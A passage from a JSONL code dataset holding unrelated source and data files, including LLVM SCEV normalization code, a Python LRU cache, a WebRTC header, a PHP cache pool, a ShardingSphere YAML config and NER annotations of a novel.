&Loops;\n ScalarEvolution &SE;\n DominatorTree &DT;\n\n DenseMap Transformed;\n\npublic:\n PostIncTransform(TransformKind kind, PostIncLoopSet &loops,\n ScalarEvolution &se, DominatorTree &dt):\n Kind(kind), Loops(loops), SE(se), DT(dt) {}\n\n const SCEV *TransformSubExpr(const SCEV *S, Instruction *User,\n Value *OperandValToReplace);\n\nprotected:\n const SCEV *TransformImpl(const SCEV *S, Instruction *User,\n Value *OperandValToReplace);\n};\n\n} // namespace\n\n/// Implement post-inc transformation for all valid expression types.\nconst SCEV *PostIncTransform::\nTransformImpl(const SCEV *S, Instruction *User, Value *OperandValToReplace) {\n\n if (const SCEVCastExpr *X = dyn_cast(S)) {\n const SCEV *O = X->getOperand();\n const SCEV *N = TransformSubExpr(O, User, OperandValToReplace);\n if (O != N)\n switch (S->getSCEVType()) {\n case scZeroExtend: return SE.getZeroExtendExpr(N, S->getType());\n case scSignExtend: return SE.getSignExtendExpr(N, S->getType());\n case scTruncate: return SE.getTruncateExpr(N, S->getType());\n default: llvm_unreachable(\"Unexpected SCEVCastExpr kind!\");\n }\n return S;\n }\n\n if (const SCEVAddRecExpr *AR = dyn_cast(S)) {\n // An addrec. This is the interesting part.\n SmallVector Operands;\n const Loop *L = AR->getLoop();\n // The addrec conceptually uses its operands at loop entry.\n Instruction *LUser = &L->getHeader()->front();\n // Transform each operand.\n for (SCEVNAryExpr::op_iterator I = AR->op_begin(), E = AR->op_end();\n I != E; ++I) {\n Operands.push_back(TransformSubExpr(*I, LUser, nullptr));\n }\n // Conservatively use AnyWrap until/unless we need FlagNW.\n const SCEV *Result = SE.getAddRecExpr(Operands, L, SCEV::FlagAnyWrap);\n switch (Kind) {\n case NormalizeAutodetect:\n // Normalize this SCEV by subtracting the expression for the final step.\n // We only allow affine AddRecs to be normalized, otherwise we would not\n // be able to correctly denormalize.\n // e.g. {1,+,3,+,2} == {-2,+,1,+,2} + {3,+,2}\n // Normalized form: {-2,+,1,+,2}\n // Denormalized form: {1,+,3,+,2}\n //\n // However, denormalization would use a different step expression than\n // normalization (see getPostIncExpr), generating the wrong final\n // expression: {-2,+,1,+,2} + {1,+,2} => {-1,+,3,+,2}\n if (AR->isAffine() &&\n IVUseShouldUsePostIncValue(User, OperandValToReplace, L, &DT)) {\n const SCEV *TransformedStep =\n TransformSubExpr(AR->getStepRecurrence(SE),\n User, OperandValToReplace);\n Result = SE.getMinusSCEV(Result, TransformedStep);\n Loops.insert(L);\n }\n#if 0\n // This assert is conceptually correct, but ScalarEvolution currently\n // sometimes fails to canonicalize two equal SCEVs to exactly the same\n // form. It's possibly a pessimization when this happens, but it isn't a\n // correctness problem, so disable this assert for now.\n assert(S == TransformSubExpr(Result, User, OperandValToReplace) &&\n \"SCEV normalization is not invertible!\");\n#endif\n break;\n case Normalize:\n // We want to normalize step expression, because otherwise we might not be\n // able to denormalize to the original expression.\n //\n // Here is an example what will happen if we don't normalize step:\n // ORIGINAL ISE:\n // {(100 /u {1,+,1}<%bb16>),+,(100 /u {1,+,1}<%bb16>)}<%bb25>\n // NORMALIZED ISE:\n // {((-1 * (100 /u {1,+,1}<%bb16>)) + (100 /u {0,+,1}<%bb16>)),+,\n // (100 /u {0,+,1}<%bb16>)}<%bb25>\n // DENORMALIZED BACK ISE:\n // {((2 * (100 /u {1,+,1}<%bb16>)) + (-1 * (100 /u {2,+,1}<%bb16>))),+,\n // (100 /u {1,+,1}<%bb16>)}<%bb25>\n // Note that the initial value changes after normalization +\n // denormalization, which isn't correct.\n if (Loops.count(L)) {\n const SCEV *TransformedStep =\n TransformSubExpr(AR->getStepRecurrence(SE),\n User, OperandValToReplace);\n Result = SE.getMinusSCEV(Result, TransformedStep);\n }\n#if 0\n // See the comment on the assert above.\n assert(S == TransformSubExpr(Result, User, OperandValToReplace) &&\n \"SCEV normalization is not invertible!\");\n#endif\n break;\n case Denormalize:\n // Here we want to normalize step expressions for the same reasons, as\n // stated above.\n if (Loops.count(L)) {\n const SCEV *TransformedStep =\n TransformSubExpr(AR->getStepRecurrence(SE),\n User, OperandValToReplace);\n Result = SE.getAddExpr(Result, TransformedStep);\n }\n break;\n }\n return Result;\n }\n\n if (const SCEVNAryExpr *X = dyn_cast(S)) {\n SmallVector Operands;\n bool Changed = false;\n // Transform each operand.\n for (SCEVNAryExpr::op_iterator I = X->op_begin(), E = X->op_end();\n I != E; ++I) {\n const SCEV *O = *I;\n const SCEV *N = TransformSubExpr(O, User, OperandValToReplace);\n Changed |= N != O;\n Operands.push_back(N);\n }\n // If any operand actually changed, return a transformed result.\n if (Changed)\n switch (S->getSCEVType()) {\n case scAddExpr: return SE.getAddExpr(Operands);\n case scMulExpr: return SE.getMulExpr(Operands);\n case scSMaxExpr: return SE.getSMaxExpr(Operands);\n case scUMaxExpr: return SE.getUMaxExpr(Operands);\n default: llvm_unreachable(\"Unexpected SCEVNAryExpr kind!\");\n }\n return S;\n }\n\n if (const SCEVUDivExpr *X = dyn_cast(S)) {\n const SCEV *LO = X->getLHS();\n const SCEV *RO = X->getRHS();\n const SCEV *LN = TransformSubExpr(LO, User, OperandValToReplace);\n const SCEV *RN = TransformSubExpr(RO, User, OperandValToReplace);\n if (LO != LN || RO != RN)\n return SE.getUDivExpr(LN, RN);\n return S;\n }\n\n llvm_unreachable(\"Unexpected SCEV kind!\");\n}\n\n/// Manage recursive transformation across an expression DAG. Revisiting\n/// expressions would lead to exponential recursion.\nconst SCEV *PostIncTransform::\nTransformSubExpr(const SCEV *S, Instruction *User, Value *OperandValToReplace) {\n\n if (isa(S) || isa(S))\n return S;\n\n const SCEV *Result = Transformed.lookup(S);\n if (Result)\n return Result;\n\n Result = TransformImpl(S, User, OperandValToReplace);\n Transformed[S] = Result;\n return Result;\n}\n\n/// Top level driver for transforming an expression DAG into its requested\n/// post-inc form (either \"Normalized\" or \"Denormalized\").\nconst SCEV *llvm::TransformForPostIncUse(TransformKind Kind,\n const SCEV *S,\n Instruction *User,\n Value *OperandValToReplace,\n PostIncLoopSet &Loops,\n ScalarEvolution &SE,\n DominatorTree &DT) {\n PostIncTransform Transform(Kind, Loops, SE, DT);\n return Transform.TransformSubExpr(S, User, OperandValToReplace);\n}\n"} {"text": "using System;\nusing System.Collections.Generic;\nusing System.IO;\nusing System.Linq;\nusing System.Runtime.InteropServices.WindowsRuntime;\nusing Windows.ApplicationModel;\nusing Windows.ApplicationModel.Activation;\nusing Windows.Foundation;\nusing Windows.Foundation.Collections;\nusing Windows.UI.Xaml;\nusing Windows.UI.Xaml.Controls;\nusing Windows.UI.Xaml.Controls.Primitives;\nusing Windows.UI.Xaml.Data;\nusing Windows.UI.Xaml.Input;\nusing Windows.UI.Xaml.Media;\nusing Windows.UI.Xaml.Media.Animation;\nusing Windows.UI.Xaml.Navigation;\n\n// The Blank Application template is documented at http://go.microsoft.com/fwlink/?LinkId=391641\n\nnamespace TraditionalCheckBox.WinPhone81\n{\n /// \n /// Provides application-specific behavior to supplement the default Application class.\n /// \n public sealed partial class App : Application\n {\n private TransitionCollection transitions;\n\n /// \n /// Initializes the singleton application object. This is the first line of authored code\n /// executed, and as such is the logical equivalent of main() or WinMain().\n /// \n public App()\n {\n this.InitializeComponent();\n this.Suspending += this.OnSuspending;\n }\n\n /// \n /// Invoked when the application is launched normally by the end user. Other entry points\n /// will be used when the application is launched to open a specific file, to display\n /// search results, and so forth.\n /// \n /// Details about the launch request and process.\n protected override void OnLaunched(LaunchActivatedEventArgs e)\n {\n#if DEBUG\n if (System.Diagnostics.Debugger.IsAttached)\n {\n this.DebugSettings.EnableFrameRateCounter = true;\n }\n#endif\n\n Frame rootFrame = Window.Current.Content as Frame;\n\n // Do not repeat app initialization when the Window already has content,\n // just ensure that the window is active\n if (rootFrame == null)\n {\n // Create a Frame to act as the navigation context and navigate to the first page\n rootFrame = new Frame();\n\n // TODO: change this value to a cache size that is appropriate for your application\n rootFrame.CacheSize = 1;\n\n // Set the default language\n rootFrame.Language = Windows.Globalization.ApplicationLanguages.Languages[0];\n\n Xamarin.Forms.Forms.Init(e);\n\n if (e.PreviousExecutionState == ApplicationExecutionState.Terminated)\n {\n // TODO: Load state from previously suspended application\n }\n\n // Place the frame in the current Window\n Window.Current.Content = rootFrame;\n }\n\n if (rootFrame.Content == null)\n {\n // Removes the turnstile navigation for startup.\n if (rootFrame.ContentTransitions != null)\n {\n this.transitions = new TransitionCollection();\n foreach (var c in rootFrame.ContentTransitions)\n {\n this.transitions.Add(c);\n }\n }\n\n rootFrame.ContentTransitions = null;\n rootFrame.Navigated += this.RootFrame_FirstNavigated;\n\n // When the navigation stack isn't restored navigate to the first page,\n // configuring the new page by passing required information as a navigation\n // parameter\n if (!rootFrame.Navigate(typeof(MainPage), e.Arguments))\n {\n throw new Exception(\"Failed to create initial page\");\n }\n }\n\n // Ensure the current window is active\n Window.Current.Activate();\n }\n\n /// \n /// Restores the content transitions after the app has launched.\n /// \n /// The object where the handler is attached.\n /// Details about the navigation event.\n private void RootFrame_FirstNavigated(object sender, NavigationEventArgs e)\n {\n var rootFrame = sender as Frame;\n rootFrame.ContentTransitions = this.transitions ?? new TransitionCollection() { new NavigationThemeTransition() };\n rootFrame.Navigated -= this.RootFrame_FirstNavigated;\n }\n\n /// \n /// Invoked when application execution is being suspended. Application state is saved\n /// without knowing whether the application will be terminated or resumed with the contents\n /// of memory still intact.\n /// \n /// The source of the suspend request.\n /// Details about the suspend request.\n private void OnSuspending(object sender, SuspendingEventArgs e)\n {\n var deferral = e.SuspendingOperation.GetDeferral();\n\n // TODO: Save application state and stop any background activity\n deferral.Complete();\n }\n }\n}"} {"text": "#pragma once\r\n\r\n// Keyboard keys acting like gamepad buttons\r\n#ifndef HAS_KBCTRL\r\n#define HAS_KBCTRL 0\r\n#endif\r\n\r\n#if HAS_KBCTRL == 1\r\n#include \r\n#include \"controls/controller_buttons.h\"\r\n\r\nnamespace dvl {\r\n\r\nControllerButton KbCtrlToControllerButton(const SDL_Event &event);\r\n\r\nbool IsKbCtrlButtonPressed(ControllerButton button);\r\n\r\nbool ProcessKbCtrlAxisMotion(const SDL_Event &event);\r\n\r\n} // namespace dvl\r\n#endif\r\n"} {"text": "# Copyright (C) 2011 Google Inc. All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are\n# met:\n#\n# * Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n# * Redistributions in binary form must reproduce the above\n# copyright notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n# \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\n# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR\n# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT\n# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,\n# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT\n# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,\n# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY\n# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\n\nclass Node():\n def __init__(self, key, value):\n self.key = key\n self.value = value\n self.prev = None\n self.next = None\n\n\nclass LRUCache():\n \"\"\"An implementation of Least Recently Used (LRU) Cache.\"\"\"\n\n def __init__(self, capacity):\n \"\"\"Initializes a lru cache with the given capacity.\n\n Args:\n capacity: The capacity of the cache.\n \"\"\"\n assert capacity > 0, \"capacity (%s) must be greater than zero.\" % capacity\n self._first = None\n self._last = None\n self._dict = {}\n self._capacity = capacity\n\n def __setitem__(self, key, value):\n if key in self._dict:\n self.__delitem__(key)\n if not self._first:\n self._one_node(key, value)\n return\n if len(self._dict) >= self._capacity:\n del self._dict[self._last.key]\n if self._capacity == 1:\n self._one_node(key, value)\n return\n self._last = self._last.next\n self._last.prev = None\n node = Node(key, value)\n node.prev = self._first\n self._first.next = node\n self._first = node\n self._dict[key] = node\n\n def _one_node(self, key, value):\n node = Node(key, value)\n self._dict[key] = node\n self._first = node\n self._last = node\n\n def __getitem__(self, key):\n if not self._first:\n raise KeyError(str(key))\n if self._first.key == key:\n return self._first.value\n\n if self._last.key == key:\n next_last = self._last.next\n next_last.prev = None\n next_first = self._last\n next_first.prev = self._first\n next_first.next = None\n self._first.next = next_first\n self._first = next_first\n self._last = next_last\n return self._first.value\n\n node = self._dict[key]\n node.next.prev = node.prev\n node.prev.next = node.next\n node.prev = self._first\n node.next = None\n self._first.next = node\n self._first = node\n return self._first.value\n\n def __delitem__(self, key):\n node = self._dict[key]\n del self._dict[key]\n if self._first is self._last:\n self._last = None\n self._first = None\n return\n if self._first is node:\n self._first = node.prev\n self._first.next = None\n return\n if self._last is node:\n self._last = node.next\n self._last.prev = None\n return\n node.next.prev = node.prev\n node.prev.next = node.next\n\n def __len__(self):\n return len(self._dict)\n\n def __contains__(self, key):\n return key in self._dict\n\n def __iter__(self):\n return iter(self._dict)\n\n def items(self):\n return [(key, node.value) for key, node in self._dict.items()]\n\n def values(self):\n return [node.value for node in self._dict.values()]\n\n def keys(self):\n return self._dict.keys()\n"} {"text": "/*\n * Copyright (c) 2017 The WebRTC project authors. All Rights Reserved.\n *\n * Use of this source code is governed by a BSD-style license\n * that can be found in the LICENSE file in the root of the source\n * tree. An additional intellectual property rights grant can be found\n * in the file PATENTS. All contributing project authors may\n * be found in the AUTHORS file in the root of the source tree.\n */\n\n#ifndef MODULES_DESKTOP_CAPTURE_WIN_DXGI_CONTEXT_H_\n#define MODULES_DESKTOP_CAPTURE_WIN_DXGI_CONTEXT_H_\n\n#include \n#include \"modules/desktop_capture/desktop_region.h\"\n\nnamespace webrtc {\n\n// A DxgiOutputContext stores the status of a single DxgiFrame of\n// DxgiOutputDuplicator.\nstruct DxgiOutputContext final {\n // The updated region DxgiOutputDuplicator::DetectUpdatedRegion() output\n // during last Duplicate() function call. It's always relative to the (0, 0).\n DesktopRegion updated_region;\n};\n\n// A DxgiAdapterContext stores the status of a single DxgiFrame of\n// DxgiAdapterDuplicator.\nstruct DxgiAdapterContext final {\n DxgiAdapterContext();\n DxgiAdapterContext(const DxgiAdapterContext& other);\n ~DxgiAdapterContext();\n\n // Child DxgiOutputContext belongs to this AdapterContext.\n std::vector contexts;\n};\n\n// A DxgiFrameContext stores the status of a single DxgiFrame of\n// DxgiDuplicatorController.\nstruct DxgiFrameContext final {\n public:\n DxgiFrameContext();\n // Unregister this Context instance from DxgiDuplicatorController during\n // destructing.\n ~DxgiFrameContext();\n\n // Reset current Context, so it will be reinitialized next time.\n void Reset();\n\n // A Context will have an exactly same |controller_id| as\n // DxgiDuplicatorController, to ensure it has been correctly setted up after\n // each DxgiDuplicatorController::Initialize().\n int controller_id = 0;\n\n // Child DxgiAdapterContext belongs to this DxgiFrameContext.\n std::vector contexts;\n};\n\n} // namespace webrtc\n\n#endif // MODULES_DESKTOP_CAPTURE_WIN_DXGI_CONTEXT_H_\n"} {"text": "getItems([$key]));\n }\n\n /**\n * {@inheritdoc}\n */\n public function getItems(array $keys = [])\n {\n $items = [];\n\n foreach ($keys as $key) {\n $items[$key] = $this->hasItem($key) ? clone $this->items[$key] : new Item($key);\n }\n\n return $items;\n }\n\n /**\n * {@inheritdoc}\n */\n public function hasItem($key)\n {\n $this->isValidKey($key);\n\n return isset($this->items[$key]) && $this->items[$key]->isHit();\n }\n\n /**\n * {@inheritdoc}\n */\n public function clear()\n {\n $this->items = [];\n $this->deferredItems = [];\n\n return true;\n }\n\n /**\n * {@inheritdoc}\n */\n public function deleteItem($key)\n {\n return $this->deleteItems([$key]);\n }\n\n /**\n * {@inheritdoc}\n */\n public function deleteItems(array $keys)\n {\n array_walk($keys, [$this, 'isValidKey']);\n\n foreach ($keys as $key) {\n unset($this->items[$key]);\n }\n\n return true;\n }\n\n /**\n * {@inheritdoc}\n */\n public function save(CacheItemInterface $item)\n {\n $this->items[$item->getKey()] = $item;\n\n return true;\n }\n\n /**\n * {@inheritdoc}\n */\n public function saveDeferred(CacheItemInterface $item)\n {\n $this->deferredItems[$item->getKey()] = $item;\n\n return true;\n }\n\n /**\n * {@inheritdoc}\n */\n public function commit()\n {\n foreach ($this->deferredItems as $item) {\n $this->save($item);\n }\n\n $this->deferredItems = [];\n\n return true;\n }\n\n /**\n * Determines if the provided key is valid.\n *\n * @param string $key\n * @return bool\n * @throws InvalidArgumentException\n */\n private function isValidKey($key)\n {\n $invalidCharacters = '{}()/\\\\\\\\@:';\n\n if (!is_string($key) || preg_match(\"#[$invalidCharacters]#\", $key)) {\n throw new InvalidArgumentException('The provided key is not valid: ' . var_export($key, true));\n }\n\n return true;\n }\n}\n"} {"text": "// !$*UTF8*$!\n{\n\t089C1669FE841209C02AAC07 /* Project object */ = {\n\t\tactiveBuildConfigurationName = Release;\n\t\tactiveTarget = 8D01CCC60486CAD60068D4B7 /* TPDFDither */;\n\t\tcodeSenseManager = 8BD3CCB9148830B20062E48C /* Code sense */;\n\t\tperUserDictionary = {\n\t\t\tPBXConfiguration.PBXFileTableDataSource3.PBXFileTableDataSource = {\n\t\t\t\tPBXFileTableDataSourceColumnSortingDirectionKey = \"-1\";\n\t\t\t\tPBXFileTableDataSourceColumnSortingKey = PBXFileDataSource_Filename_ColumnID;\n\t\t\t\tPBXFileTableDataSourceColumnWidthsKey = (\n\t\t\t\t\t20,\n\t\t\t\t\t649,\n\t\t\t\t\t20,\n\t\t\t\t\t48,\n\t\t\t\t\t43,\n\t\t\t\t\t43,\n\t\t\t\t\t20,\n\t\t\t\t);\n\t\t\t\tPBXFileTableDataSourceColumnsKey = (\n\t\t\t\t\tPBXFileDataSource_FiletypeID,\n\t\t\t\t\tPBXFileDataSource_Filename_ColumnID,\n\t\t\t\t\tPBXFileDataSource_Built_ColumnID,\n\t\t\t\t\tPBXFileDataSource_ObjectSize_ColumnID,\n\t\t\t\t\tPBXFileDataSource_Errors_ColumnID,\n\t\t\t\t\tPBXFileDataSource_Warnings_ColumnID,\n\t\t\t\t\tPBXFileDataSource_Target_ColumnID,\n\t\t\t\t);\n\t\t\t};\n\t\t\tPBXConfiguration.PBXTargetDataSource.PBXTargetDataSource = {\n\t\t\t\tPBXFileTableDataSourceColumnSortingDirectionKey = \"-1\";\n\t\t\t\tPBXFileTableDataSourceColumnSortingKey = PBXFileDataSource_Filename_ColumnID;\n\t\t\t\tPBXFileTableDataSourceColumnWidthsKey = (\n\t\t\t\t\t20,\n\t\t\t\t\t252,\n\t\t\t\t\t60,\n\t\t\t\t\t20,\n\t\t\t\t\t48,\n\t\t\t\t\t43,\n\t\t\t\t\t43,\n\t\t\t\t);\n\t\t\t\tPBXFileTableDataSourceColumnsKey = (\n\t\t\t\t\tPBXFileDataSource_FiletypeID,\n\t\t\t\t\tPBXFileDataSource_Filename_ColumnID,\n\t\t\t\t\tPBXTargetDataSource_PrimaryAttribute,\n\t\t\t\t\tPBXFileDataSource_Built_ColumnID,\n\t\t\t\t\tPBXFileDataSource_ObjectSize_ColumnID,\n\t\t\t\t\tPBXFileDataSource_Errors_ColumnID,\n\t\t\t\t\tPBXFileDataSource_Warnings_ColumnID,\n\t\t\t\t);\n\t\t\t};\n\t\t\tPBXPerProjectTemplateStateSaveDate = 615684063;\n\t\t\tPBXWorkspaceStateSaveDate = 615684063;\n\t\t};\n\t\tperUserProjectItems = {\n\t\t\t8BB06EF824A93B2D000F894A /* PlistBookmark */ = 8BB06EF824A93B2D000F894A /* PlistBookmark */;\n\t\t\t8BB070F624A947D8000F894A /* PBXTextBookmark */ = 8BB070F624A947D8000F894A /* PBXTextBookmark */;\n\t\t\t8BB9A49424B294CF00CD76A8 /* PBXTextBookmark */ = 8BB9A49424B294CF00CD76A8 /* PBXTextBookmark */;\n\t\t\t8BB9A58024B297F000CD76A8 /* PBXTextBookmark */ = 8BB9A58024B297F000CD76A8 /* PBXTextBookmark */;\n\t\t};\n\t\tsourceControlManager = 8BD3CCB8148830B20062E48C /* Source Control */;\n\t\tuserBuildSettings = {\n\t\t};\n\t};\n\t8BA05A660720730100365D66 /* TPDFDither.cpp */ = {\n\t\tuiCtxt = {\n\t\t\tsepNavIntBoundsRect = \"{{0, 0}, {839, 3198}}\";\n\t\t\tsepNavSelRange = \"{9650, 0}\";\n\t\t\tsepNavVisRange = \"{8782, 952}\";\n\t\t\tsepNavWindowFrame = \"{{525, 43}, {679, 835}}\";\n\t\t};\n\t};\n\t8BA05A690720730100365D66 /* TPDFDitherVersion.h */ = {\n\t\tuiCtxt = {\n\t\t\tsepNavIntBoundsRect = \"{{0, 0}, {824, 767}}\";\n\t\t\tsepNavSelRange = \"{2945, 0}\";\n\t\t\tsepNavVisRange = \"{32, 2933}\";\n\t\t\tsepNavWindowFrame = \"{{15, 38}, {679, 835}}\";\n\t\t};\n\t};\n\t8BB06EF824A93B2D000F894A /* PlistBookmark */ = {\n\t\tisa = PlistBookmark;\n\t\tfRef = 8D01CCD10486CAD60068D4B7 /* Info.plist */;\n\t\tfallbackIsa = PBXBookmark;\n\t\tisK = 0;\n\t\tkPath = (\n\t\t\tCFBundleName,\n\t\t);\n\t\tname = /Users/christopherjohnson/Desktop/TPDFDither/Info.plist;\n\t\trLen = 0;\n\t\trLoc = 9223372036854775808;\n\t};\n\t8BB070F624A947D8000F894A /* PBXTextBookmark */ = {\n\t\tisa = PBXTextBookmark;\n\t\tfRef = 8BC6025B073B072D006C4272 /* TPDFDither.h */;\n\t\tname = \"TPDFDither.h: 135\";\n\t\trLen = 0;\n\t\trLoc = 5317;\n\t\trType = 0;\n\t\tvrLen = 1095;\n\t\tvrLoc = 4325;\n\t};\n\t8BB9A49424B294CF00CD76A8 /* PBXTextBookmark */ = {\n\t\tisa = PBXTextBookmark;\n\t\tfRef = 8BA05A660720730100365D66 /* TPDFDither.cpp */;\n\t\tname = \"TPDFDither.cpp: 228\";\n\t\trLen = 0;\n\t\trLoc = 9650;\n\t\trType = 0;\n\t\tvrLen = 1490;\n\t\tvrLoc = 6952;\n\t};\n\t8BB9A58024B297F000CD76A8 /* PBXTextBookmark */ = {\n\t\tisa = PBXTextBookmark;\n\t\tfRef = 8BA05A660720730100365D66 /* TPDFDither.cpp */;\n\t\tname = \"TPDFDither.cpp: 228\";\n\t\trLen = 0;\n\t\trLoc = 9650;\n\t\trType = 0;\n\t\tvrLen = 952;\n\t\tvrLoc = 8782;\n\t};\n\t8BC6025B073B072D006C4272 /* TPDFDither.h */ = {\n\t\tuiCtxt = {\n\t\t\tsepNavIntBoundsRect = \"{{0, 0}, {894, 2067}}\";\n\t\t\tsepNavSelRange = \"{5317, 0}\";\n\t\t\tsepNavVisRange = \"{4325, 1095}\";\n\t\t\tsepNavWindowFrame = \"{{725, 43}, {679, 835}}\";\n\t\t};\n\t};\n\t8BD3CCB8148830B20062E48C /* Source Control */ = {\n\t\tisa = PBXSourceControlManager;\n\t\tfallbackIsa = XCSourceControlManager;\n\t\tisSCMEnabled = 0;\n\t\tscmConfiguration = {\n\t\t\trepositoryNamesForRoots = {\n\t\t\t\t\"\" = \"\";\n\t\t\t};\n\t\t};\n\t};\n\t8BD3CCB9148830B20062E48C /* Code sense */ = {\n\t\tisa = PBXCodeSenseManager;\n\t\tindexTemplatePath = \"\";\n\t};\n\t8D01CCC60486CAD60068D4B7 /* TPDFDither */ = {\n\t\tactiveExec = 0;\n\t};\n}\n"} {"text": "dataSources:\n ds_0: !!com.zaxxer.hikari.HikariDataSource\n driverClassName: com.mysql.jdbc.Driver\n jdbcUrl: jdbc:mysql://localhost:3306/demo_ds_0?serverTimezone=UTC&useSSL=false&useUnicode=true&characterEncoding=UTF-8\n username: root\n password:\n ds_1: !!com.zaxxer.hikari.HikariDataSource\n driverClassName: com.mysql.jdbc.Driver\n jdbcUrl: jdbc:mysql://localhost:3306/demo_ds_1?serverTimezone=UTC&useSSL=false&useUnicode=true&characterEncoding=UTF-8\n username: root\n password:\n\nshardingRule:\n tables:\n t_order: \n actualDataNodes: ds_${0..1}.t_order_${0..1}\n tableStrategy: \n standard:\n shardingColumn: order_id\n preciseAlgorithmClassName: org.apache.shardingsphere.example.algorithm.PreciseModuloShardingTableAlgorithm\n rangeAlgorithmClassName: org.apache.shardingsphere.example.algorithm.RangeModuloShardingTableAlgorithm\n keyGenerator:\n type: SNOWFLAKE\n column: order_id\n props:\n worker.id: 123 \n t_order_item:\n actualDataNodes: ds_${0..1}.t_order_item_${0..1}\n tableStrategy:\n standard:\n shardingColumn: order_id\n preciseAlgorithmClassName: org.apache.shardingsphere.example.algorithm.PreciseModuloShardingTableAlgorithm\n rangeAlgorithmClassName: org.apache.shardingsphere.example.algorithm.RangeModuloShardingTableAlgorithm\n keyGenerator:\n type: SNOWFLAKE\n column: order_item_id\n props:\n worker.id: 123 \n bindingTables:\n - t_order,t_order_item\n broadcastTables:\n - t_address\n defaultDatabaseStrategy:\n standard:\n shardingColumn: user_id\n preciseAlgorithmClassName: org.apache.shardingsphere.example.algorithm.PreciseModuloShardingDatabaseAlgorithm\n rangeAlgorithmClassName: org.apache.shardingsphere.example.algorithm.RangeModuloShardingDatabaseAlgorithm\n defaultTableStrategy:\n none:\n\nprops:\n sql.show: false\n"} {"text": "MENTION\tT0\t0\t8\t0\t9\tThe Signora\tPER\tNOM\nMENTION\tT2\t1\t21\t1\t22\ta courtyard\tFAC\tNOM\nMENTION\tT4\t3\t2\t3\t3\ta Cockney\tPER\tNOM\nMENTION\tT5\t4\t9\t4\t10\tthe Signora\tPER\tNOM\nMENTION\tT8\t6\t62\t6\t64\tthe English church\tORG\tNOM\nMENTION\tT11\t11\t12\t11\t13\tMiss Bartlett\tPER\tPROP\nMENTION\tT12\t13\t0\t13\t8\tThe rooms the Signora promised us in her letter\tFAC\tNOM\nMENTION\tT13\t13\t2\t13\t3\tthe Signora\tPER\tNOM\nMENTION\tT14\t14\t0\t14\t1\tThe Signora\tPER\tNOM\nMENTION\tT16\t16\t8\t16\t9\tMiss Bartlett\tPER\tPROP\nMENTION\tT17\t20\t5\t20\t6\tthe front\tFAC\tNOM\nMENTION\tT18\t20\t0\t20\t6\tThe first vacant room in the front\tFAC\tNOM\nMENTION\tT20\t20\t28\t20\t28\tLucy\tPER\tPROP\nMENTION\tT21\t24\t0\t24\t1\tYour mother\tPER\tNOM\nMENTION\tT22\t26\t0\t26\t1\tThe ladies\tPER\tNOM\nMENTION\tT23\t28\t2\t28\t3\ttheir neighbours\tPER\tNOM\nMENTION\tT25\t30\t0\t30\t1\tMiss Bartlett\tPER\tPROP\nMENTION\tT26\t32\t3\t32\t4\tthe intruder\tPER\tNOM\nMENTION\tT28\t41\t8\t41\t10\tthe old man\tPER\tNOM\nMENTION\tT31\t43\t5\t43\t6\tMiss Bartlett\tPER\tPROP\nMENTION\tT32\t44\t15\t44\t16\tour rooms\tFAC\tNOM\nMENTION\tT33\t46\t4\t46\t4\ttourist\tPER\tNOM\nMENTION\tT34\t47\t0\t47\t1\tMiss Bartlett\tPER\tPROP\nMENTION\tT36\t49\t1\t49\t3\tthe old man\tPER\tNOM\nMENTION\tT37\t52\t0\t52\t1\tHer cousin\tPER\tNOM\nMENTION\tT38\t55\t8\t55\t8\tmen\tPER\tNOM\nMENTION\tT39\t56\t14\t56\t15\this son\tPER\tNOM\nMENTION\tT40\t56\t7\t56\t9\ta naughty child\tPER\tNOM\nMENTION\tT41\t57\t8\t57\t9\tthe rooms\tFAC\tNOM\nMENTION\tT42\t57\t13\t57\t14\tthe son\tPER\tNOM\nMENTION\tT43\t59\t5\t59\t6\tthe ladies\tPER\tNOM\nMENTION\tT44\t60\t33\t60\t35\tthese ill-bred tourists\tPER\tNOM\nMENTION\tT46\t61\t5\t61\t6\tMiss Bartlett\tPER\tPROP\nMENTION\tT47\t61\t1\t61\t3\tthe old man\tPER\tNOM\nMENTION\tT48\t64\t0\t64\t1\tMiss Bartlett\tPER\tPROP\nMENTION\tT52\t75\t6\t75\t7\tthe room\tFAC\tNOM\nMENTION\tT55\t79\t11\t79\t12\tthe rooms\tFAC\tNOM\nMENTION\tT56\t81\t0\t81\t1\tMiss Bartlett\tPER\tPROP\nMENTION\tT57\t81\t14\t81\t15\tMr. Beebe\tPER\tPROP\nMENTION\tT59\t83\t16\t83\t17\tthe ladies\tPER\tNOM\nMENTION\tT61\t85\t33\t85\t34\ther cousin\tPER\tNOM\nMENTION\tT62\t85\t30\t85\t31\tthe waiter\tPER\tNOM\nMENTION\tT63\t88\t1\t88\t2\tMiss Honeychurch\tPER\tPROP\nMENTION\tT64\t88\t48\t88\t48\tmother\tPER\tNOM\nMENTION\tT66\t88\t13\t88\t14\tMiss Bartlett\tPER\tPROP\nMENTION\tT67\t88\t8\t88\t9\tSummer Street\tFAC\tPROP\nMENTION\tT68\t89\t9\t89\t10\tTunbridge Wells\tGPE\tPROP\nMENTION\tT69\t89\t24\t89\t25\tMr. Beebe\tPER\tPROP\nMENTION\tT70\t89\t35\t89\t36\tthe clergyman\tPER\tNOM\nMENTION\tT71\t90\t4\t90\t5\tthe Rectory\tFAC\tNOM\nMENTION\tT72\t90\t7\t90\t8\tSummer 